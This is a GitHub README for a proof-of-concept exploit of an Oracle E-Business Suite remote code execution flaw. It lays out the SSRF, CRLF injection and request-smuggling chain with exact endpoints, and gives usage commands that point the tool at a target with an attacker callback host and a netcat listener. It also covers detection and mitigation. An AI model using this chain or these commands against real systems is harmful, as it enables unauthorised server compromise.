WahyuAndikaPutra/CVE-2025-61882-OracleEBS-RCE

GitHub: WahyuAndikaPutra/CVE-2025-61882-OracleEBS-RCE

针对 Oracle E-Business Suite CVE-2025-61882 未认证远程代码执行漏洞的概念验证利用工具,演示从 SSRF 到 HTTP 请求走私再到 RCE 的完整攻击链。

Stars: 0 | Forks: 0

``` # CVE-2025-61882: Oracle E-Business Suite Remote Code Execution (Unauthenticated) A **zero-click, pre-authentication** exploit chain in **Oracle E-Business Suite (EBS)**. This vulnerability leverages a URL injection flaw within the **Oracle Concurrent Processing / BI Publisher** component to execute *Server-Side Request Forgery (SSRF)*. Combined with a *CRLF injection*, it leads to *HTTP request smuggling* and ultimately achieves full *Remote Code Execution (RCE)*. --- ## 📌 漏洞详情 | Attribute | Value | | :--- | :--- | | **CVE ID** | CVE-2025-61882 | | **CVSS v3.1 Score** | 9.8 (Critical) | | **Attack Vector** | Network (AV:N) | | **Attack Complexity** | Low (AC:L) | | **Privileges Required** | None (PR:N) | | **User Interaction** | None (UI:N) | | **Impact** | Total compromise of Confidentiality, Integrity, and Availability (C:H/I:H/A:H) | | **Affected Versions** | Oracle EBS 12.2.3 – 12.2.14 | | **Official Advisory** | [Oracle Security Alert](https://www.oracle.com/security-alerts/alert-cve-2025-61882.html) | --- ## 🧬 Exploit 架构与链 1. **Anti-CSRF Token Acquisition** The endpoint `/OA_HTML/JavaScriptServlet` provides anti-CSRF tokens. However, the target endpoint (`UiServlet`) fails to properly validate them, making this step optional but recommended to maintain strict session consistency. 2. **`return_url` URL Injection (SSRF)** The `return_url` parameter supplied within the XML payload to `/OA_HTML/configurator/UiServlet` lacks strict whitelist validation. This allows an attacker to inject arbitrary internal URLs, pointing directly to the internal Oracle Configuration Server at `localhost:7201`. 3. **CRLF Injection via HTML Entities** The application component fails to sanitize or strip newline characters encoded as HTML entities (` `). By embedding these entities into the `return_url`, an attacker can smuggle malicious HTTP headers, resulting in an **HTTP Request Smuggling** condition against the backend services. 4. **Malicious Servlet Invocation (RCE)** The smuggled payload triggers a backend `POST` request to `/OA_HTML/help/../ieshostedsurvey.jsp`. This specific endpoint handles untrusted data leading to a deserialization/code injection vulnerability, granting the attacker arbitrary OS command execution under the context of the `oracle` user. --- ## 📦 系统要求 - **Runtime:** Python 3.8 or higher - **Dependencies:** `requests`, `urllib3` --- ## ⚙️ 安装 ```bash git clone [https://github.com/WahyuAndikaPutra/CVE-2025-61882-OracleEBS-RCE.git](https://github.com/WahyuAndikaPutra/CVE-2025-61882-OracleEBS-RCE.git) cd CVE-2025-61882-OracleEBS-RCE pip install -r requirements.txt ``` ## 🚀 使用指南 ``` python3 exploit.py [options] ``` ### 位置参数 | 参数 | 描述 | | --- | --- | | `target_base_url` | 目标 Oracle EBS 实例的完整 base URL。(例如 `http://192.168.1.100:8000`) | | `evil_server_host:port` | 攻击者控制的监听器地址,用于捕获传入的 callback。(例如 `10.10.14.99:80`) | ### 可选参数 | 选项 | 描述 | | --- | --- | | `--proxy` | 用于调试/拦截的 HTTP 代理路由字符串。(例如,Burp Suite 可使用 `--proxy http://127.0.0.1:8080`) | ### 执行示例 ``` # 不使用 upstream proxy 的标准执行 python3 exploit.py [http://target-oracle-app.com:8000/](http://target-oracle-app.com:8000/) evil.lab:80 # 通过 Burp Suite proxy 路由的执行 python3 exploit.py [http://target-oracle-app.com:8000/](http://target-oracle-app.com:8000/) evil.lab:80 --proxy [http://127.0.0.1:8080](http://127.0.0.1:8080) ``` *注意:运行脚本后,请确保你在 `evil_server` 上的监听器(例如 `nc -lvnp 80`)已准备就绪以捕获传入流量。* ## 🧪 成功验证 1. 检查 callback 服务器上的监听器日志。一条成功的漏洞利用链将生成一个入站 HTTP 请求,该请求源自 Oracle EBS 服务器的 IP 地址,并指向 `/OA_HTML/help/../ieshostedsurvey.jsp`。 2. 如果后渗透 payload(出于安全原因在此概念验证中省略)得到正确实现,将建立一个交互式的反弹 shell 会话。 ## 🛡️ 检测与缓解 ### 检测策略 * **Web 访问日志:** 审计并检查所有传入到 `/OA_HTML/configurator/UiServlet` 的请求,其中 `getUiType` 参数或 XML body 包含回车/换行模式或 HTML 实体(如 ` `)。 * **网络异常:** 监控源自 Oracle EBS 应用层发往外部或不受信任 IP 地址的出站网络连接,尤其是通过 `80` 和 `443` 端口的连接。 ### 缓解控制 * **立即修补:** 根据上方链接的官方公告,应用最新的 Oracle Critical Patch Update (CPU)。 * **应用加固:** 使用 Web Application Firewall (WAF) 或显式的 Reverse Proxy 路由规则,限制或完全阻止公共互联网对 `/OA_HTML/configurator/UiServlet` endpoint 的访问。 * **网络隔离:** 实施严格的出站过滤规则,确保 Oracle EBS 服务器无法与外部互联网主机建立未经授权的出站连接。 ## 📜 免责声明 本软件仅供**教育目的、安全研究以及在获得明确书面授权的渗透测试操作**中使用。严禁未经事先批准在生产基础设施上使用或部署,否则将面临法律诉讼。作者对任何滥用、损害或违规行为概不负责。 ## 📚 参考资料 * [Oracle 安全公告 - CVE-2025-61882](https://www.oracle.com/security-alerts/alert-cve-2025-61882.html) * [CWE-918: Server-Side Request Forgery (SSRF)](https://cwe.mitre.org/data/definitions/918.html) * [CWE-93: Improper Neutralization of CRLF Sequences ('CRLF Injection')](https://cwe.mitre.org/data/definitions/93.html) ## 📄 许可证 本仓库采用 [MIT 许可证](https://www.google.com/search?q=LICENSE) 授权。
标签:CISA项目, CVE-2025-61882, HTTP请求走私, Oracle EBS, SSRF, 编程工具, 远程代码执行, 逆向工具